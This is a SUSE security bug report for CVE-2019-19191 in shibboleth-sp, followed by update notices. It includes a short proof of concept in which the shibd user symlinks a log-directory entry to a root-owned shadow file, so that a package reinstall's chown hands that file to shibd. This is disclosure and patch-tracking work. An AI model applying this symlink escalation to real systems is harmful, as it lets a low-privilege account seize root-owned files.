Bug 1157471 (CVE-2019-19191)

Summary: VUL-0: CVE-2019-19191: shibboleth-sp: Local privilege escalation from shibd to root in upstream spec file
Product: [Novell Products] SUSE Security Incidents Reporter: Johannes Segitz <jsegitz>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: atoptsoglou, kstreitova, wolfgang.frisch
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/247710/
Whiteboard: CVSSv3:SUSE:CVE-2019-19191:8.4:(AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVSSv2:NVD:CVE-2019-19191:7.2:(AV:L/AC:L/Au:N/C:C/I:C/A:C) CVSSv3:NVD:CVE-2019-19191:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Found By: --- Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---
Bug Depends on:    
Bug Blocks: 1154062    

Description Johannes Segitz 2019-11-21 13:34:44 UTC
195 # Fix ownership of log files (even on new installs, if they're left from an older one).
196 chown %{runuser}:%{runuser} %{_localstatedir}/log/%{realname}/* 2>/dev/null || :

this allows shibd to escalate to root. POC:
sh-5.0$ id
uid=157(shibd) gid=443(shibd) groups=443(shibd)
sh-5.0$ pwd
/var/log/shibboleth
sh-5.0$ ls -lah /test
total 12K
drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
-rw-r-----  3 root root 1.2K Oct 25 13:20 shadow
sh-5.0$ ln -s /test/shadow

as root: zypper in -f shibboleth-sp

sh-5.0$ ls -lah /test
total 12K
drwxr-xr-x  2 root  root  4.0K Nov 20 13:51 .
drwxr-xr-x 23 root  root  4.0K Oct 25 11:01 ..
-rw-r-----  3 shibd shibd 1.2K Oct 25 13:20 shadow

As this is in the upstream spec file we'll not assign a CVE. I'll file a upstream report and ask MITRE for a CVE
Comment 1 Johannes Segitz 2019-11-21 14:16:37 UTC
Upstream issue: https://issues.shibboleth.net/jira/browse/SSPCPP-874
Comment 2 Johannes Segitz 2019-11-22 07:08:57 UTC
CVE-2019-19191 was assigned to this issue
Comment 5 Swamp Workflow Management 2019-12-23 20:13:23 UTC
SUSE-SU-2019:3386-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
SUSE Linux Enterprise Module for Server Applications 15-SP1 (src):    shibboleth-sp-2.6.1-3.3.1
SUSE Linux Enterprise Module for Server Applications 15 (src):    shibboleth-sp-2.6.1-3.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 6 Swamp Workflow Management 2020-01-13 23:22:13 UTC
openSUSE-SU-2020:0020-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
openSUSE Leap 15.1 (src):    shibboleth-sp-2.6.1-lp151.3.3.1
Comment 7 Swamp Workflow Management 2020-01-16 14:11:33 UTC
SUSE-SU-2020:0115-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 1157471
CVE References: CVE-2019-19191
Sources used:
SUSE OpenStack Cloud Crowbar 8 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE OpenStack Cloud 8 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE OpenStack Cloud 7 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server for SAP 12-SP1 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP5 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP4 (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src):    shibboleth-sp-2.5.5-6.6.1
SUSE Enterprise Storage 5 (src):    shibboleth-sp-2.5.5-6.6.1
HPE Helion Openstack 8 (src):    shibboleth-sp-2.5.5-6.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Alexandros Toptsoglou 2020-04-29 12:38:30 UTC
Done